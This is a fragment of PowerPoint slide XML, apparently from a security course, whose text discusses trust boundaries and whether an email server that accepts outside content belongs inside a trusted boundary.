                  <a:pt x="967740" y="813816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135636" y="813816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92756" y="806903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55522" y="787651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26164" y="758293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6912" y="721059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="678180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="135636"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28956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pPr defTabSz="914126"/>
            <a:endParaRPr sz="179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20442" y="4268632"/>
            <a:ext cx="473586" cy="396801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marR="5078" indent="66655" defTabSz="914126">
              <a:lnSpc>
                <a:spcPct val="107500"/>
              </a:lnSpc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Web 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200" spc="-20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>v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060250" y="2158188"/>
            <a:ext cx="3108785" cy="3320185"/>
            <a:chOff x="7062089" y="2157857"/>
            <a:chExt cx="3109595" cy="3321050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7517130" y="2172462"/>
              <a:ext cx="2639695" cy="3291840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2639695" h="3291840">
                  <a:moveTo>
                    <a:pt x="0" y="439927"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2581" y="391995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10147" y="345557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22429" y="300882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39158" y="258238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60066" y="217894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84884" y="180118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113345" y="145179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145179" y="113345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180118" y="84884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217894" y="60066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258238" y="39158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300882" y="22429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345557" y="10147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391995" y="2581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439928" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2199640" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2247572" y="2581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2294010" y="10147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338685" y="22429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381329" y="39158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421673" y="60066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2459449" y="84884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2494388" y="113345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2526222" y="145179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2554683" y="180118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2579501" y="217894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2600409" y="258238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2617138" y="300882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629420" y="345557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636986" y="391995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639568" y="439927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639568" y="2851911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636986" y="2899844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629420" y="2946282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2617138" y="2990957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2600409" y="3033601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2579501" y="3073945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2554683" y="3111721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2526222" y="3146660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2494388" y="3178494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2459449" y="3206955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421673" y="3231773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381329" y="3252681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338685" y="3269410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2294010" y="3281692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2247572" y="3289258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2199640" y="3291840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439928" y="3291840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391995" y="3289258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345557" y="3281692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300882" y="3269410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258238" y="3252681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217894" y="3231773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180118" y="3206955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145179" y="3178494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113345" y="3146660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84884" y="3111721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60066" y="3073945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39158" y="3033601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22429" y="2990957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10147" y="2946282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2581" y="2899844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2851911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="439927"/>
                  </a:lnTo>
                  <a:close/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7076694" y="2966466"/>
              <a:ext cx="471170" cy="1160145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="471170" h="1160145">
                  <a:moveTo>
                    <a:pt x="78485" y="1159763"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47952" y="1153590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23002" y="1136761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6173" y="1111811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1081277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6173" y="47952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23002" y="23002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47952" y="6173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78485" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422963" y="6173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447913" y="23002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464742" y="47952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470915" y="78485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470915" y="1081277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464742" y="1111811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447913" y="1136761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422963" y="1153590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392429" y="1159763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78485" y="1159763"/>
                  </a:lnTo>
                  <a:close/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208632" y="3273262"/>
            <a:ext cx="179536" cy="54849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696" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pP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re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all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786127" y="2198691"/>
            <a:ext cx="1864509" cy="3256067"/>
            <a:chOff x="6787895" y="2198370"/>
            <a:chExt cx="1864995" cy="3256915"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6802373" y="2224278"/>
              <a:ext cx="0" cy="3231515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path h="3231515">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3231007"/>
                  </a:lnTo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814565" y="3467862"/>
              <a:ext cx="262890" cy="79375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="262890" h="79375">
                  <a:moveTo>
                    <a:pt x="262763" y="79121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321801" y="3461766"/>
              <a:ext cx="80645" cy="6985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="80645" h="6985">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="80518" y="6604"/>
                  </a:lnTo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8346185" y="2198370"/>
              <a:ext cx="0" cy="3231515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path h="3231515">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3231007"/>
                  </a:lnTo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8583929" y="2721102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70">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="26288" y="0"/>
                  </a:lnTo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8626601" y="3547110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70">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="26288" y="0"/>
                  </a:lnTo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8608313" y="4441698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70">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="26288" y="0"/>
                  </a:lnTo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61242" y="1968245"/>
            <a:ext cx="5003132" cy="3073869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="298995" marR="5078" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pP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In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this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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situation,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="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everything</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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inside</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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of 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the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 TB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 is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-4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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>trusted</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298995" marR="20314" indent="-286934" defTabSz="914126">
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Someone</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>wants</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> email</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35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srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35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srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>inside </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-434" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>TB,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35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srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>do </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35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srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it?</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298995" marR="25392" indent="-286934" defTabSz="914126">
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pP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Email </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>servers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="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talk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15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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>systems</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="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outside of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-43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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>system,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="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and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 they</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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accept </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>content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that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>often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questionable</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298995" marR="100300" indent="-286934" algn="just" defTabSz="914126">
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>don't </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>feel </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>make </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>email </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-440" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35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srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>completely </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>secured </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>trusted, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>then </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-440" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> answer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35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srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212A35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srgbClr val="212A35"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>no</a:t>
            </a:r>
            <a:endParaRPr sz="1999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4701399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5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5" dirty="0"/>
              <a:t>Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25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32267"/>
            <a:ext cx="6421352" cy="391058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84730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="10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One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solution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create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two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Boundaries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864584" y="1882288"/>
            <a:ext cx="2312068" cy="3136083"/>
            <a:chOff x="7866633" y="1881885"/>
            <a:chExt cx="2312670" cy="3136900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
